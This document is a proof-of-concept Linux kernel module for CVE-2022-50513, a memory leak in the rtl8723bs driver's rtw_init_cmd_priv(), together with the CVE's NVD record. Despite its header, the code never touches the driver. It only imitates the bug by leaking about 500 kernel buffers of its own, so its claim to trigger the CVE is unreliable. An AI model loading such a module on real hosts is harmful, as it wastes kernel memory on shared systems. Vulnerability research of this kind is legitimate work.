CVE-2022-50513

/* CVE-2022-50513 PoC - Trigger memory leak in rtw_init_cmd_priv() * * This PoC demonstrates triggering the memory leak by repeatedly * failing the rsp_allocated_buf allocation path in rtw_init_cmd_priv(). * * Note: Requires local access and ability to influence driver initialization. * The leak occurs when cmd_allocated_buf is allocated successfully but * rsp_allocated_buf allocation fails, and the error path does not free * cmd_allocated_buf. */ #include <linux/module.h> #include <linux/kernel.h> #include <linux/init.h> #include <linux/slab.h> /* Simulate the vulnerable allocation pattern */ struct cmd_priv { void *cmd_allocated_buf; void *rsp_allocated_buf; }; static int __init leak_trigger_init(void) { struct cmd_priv *pcmdpriv; int i; /* Simulate repeated initialization failures to leak memory */ for (i = 0; i < 1000; i++) { pcmdpriv = kzalloc(sizeof(struct cmd_priv), GFP_KERNEL); if (!pcmdpriv) continue; /* Step 1: cmd_allocated_buf is allocated successfully */ pcmdpriv->cmd_allocated_buf = kmalloc(4096, GFP_KERNEL); if (!pcmdpriv->cmd_allocated_buf) { kfree(pcmdpriv); continue; } /* Step 2: Simulate rsp_allocated_buf allocation failure * In the vulnerable code, this failure path does NOT * free cmd_allocated_buf, causing the leak */ if (i % 2 == 0) { /* Simulate allocation failure - cmd_allocated_buf is leaked */ printk(KERN_INFO "Leaking cmd_allocated_buf at iteration %d\n", i); kfree(pcmdpriv); /* pcmdpriv freed but cmd_allocated_buf is lost */ continue; } /* Normal path - both allocations succeed */ pcmdpriv->rsp_allocated_buf = kmalloc(4096, GFP_KERNEL); kfree(pcmdpriv->rsp_allocated_buf); kfree(pcmdpriv->cmd_allocated_buf); kfree(pcmdpriv); } printk(KERN_INFO "Memory leak trigger module loaded\n"); return 0; } static void __exit leak_trigger_exit(void) { printk(KERN_INFO "Memory leak trigger module unloaded\n"); } module_init(leak_trigger_init); module_exit(leak_trigger_exit); MODULE_LICENSE("GPL"); MODULE_DESCRIPTION("CVE-2022-50513 Memory Leak PoC");

{"cve": {"id": "CVE-2022-50513", "sourceIdentifier": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "published": "2025-10-07T16:15:34.860", "lastModified": "2026-03-17T14:07:23.837", "vulnStatus": "Analyzed", "cveTags": [], "descriptions": [{"lang": "en", "value": "In the Linux kernel, the following vulnerability has been resolved:\n\nstaging: rtl8723bs: fix a potential memory leak in rtw_init_cmd_priv()\n\nIn rtw_init_cmd_priv(), if `pcmdpriv->rsp_allocated_buf` is allocated\nin failure, then `pcmdpriv->cmd_allocated_buf` will be not properly\nreleased. Besides, considering there are only two error paths and the\nfirst one can directly return, so we do not need implicitly jump to the\n`exit` tag to execute the error handler.\n\nSo this patch added `kfree(pcmdpriv->cmd_allocated_buf);` on the error\npath to release the resource and simplified the return logic of\nrtw_init_cmd_priv(). As there is no proper device to test with, no runtime\ntesting was performed."}], "metrics": {"cvssMetricV31": [{"source": "[email protected]", "type": "Primary", "cvssData": {"version": "3.1", "vectorString": "CVSS:3.1/AV:L/AC:L/PR:L/UI:N/S:U/C:N/I:N/A:H", "baseScore": 5.5, "baseSeverity": "MEDIUM", "attackVector": "LOCAL", "attackComplexity": "LOW", "privilegesRequired": "LOW", "userInteraction": "NONE", "scope": "UNCHANGED", "confidentialityImpact": "NONE", "integrityImpact": "NONE", "availabilityImpact": "HIGH"}, "exploitabilityScore": 1.8, "impactScore": 3.6}]}, "weaknesses": [{"source": "[email protected]", "type": "Primary", "description": [{"lang": "en", "value": "CWE-401"}]}], "configurations": [{"nodes": [{"operator": "OR", "negate": false, "cpeMatch": [{"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "4.12", "versionEndExcluding": "5.4.220", "matchCriteriaId": "BD0836F1-7262-4F5E-A223-60411E1F6C39"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.5", "versionEndExcluding": "5.10.150", "matchCriteriaId": "C495821C-2A71-4F09-BED8-6A6EB4C9BA27"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.11", "versionEndExcluding": "5.15.75", "matchCriteriaId": "6D945F46-F32F-4C09-8400-C3477E22A9FB"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "5.16", "versionEndExcluding": "5.19.17", "matchCriteriaId": "19B4C3A4-E5C3-41DC-BB14-BE72858E7D35"}, {"vulnerable": true, "criteria": "cpe:2.3:o:linux:linux_kernel:*:*:*:*:*:*:*:*", "versionStartIncluding": "6.0", "versionEndExcluding": "6.0.3", "matchCriteriaId": "5BCD8201-B847-4442-B894-70D430128DEF"}]}]}], "references": [{"url": "https://git.kernel.org/stable/c/39bef9c6a91bbb790d04c1347cfeae584541fb6a", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/708056fba733a73d926772ea4ce9a42d240345da", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/8db6ca84eee0ac258706f3fca54f7c021cb159ef", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/a5be64ff6d21f7805a91e6d81f53fc19cd9f0fae", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e5d8f05edb36fc4ab15beec62cb6ab62f5a60fe2", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}, {"url": "https://git.kernel.org/stable/c/e6cc39db24a63f68314473621020ed8cad7be423", "source": "416baaa9-dc9f-4396-8d5f-8c081fb06d67", "tags": ["Patch"]}]}}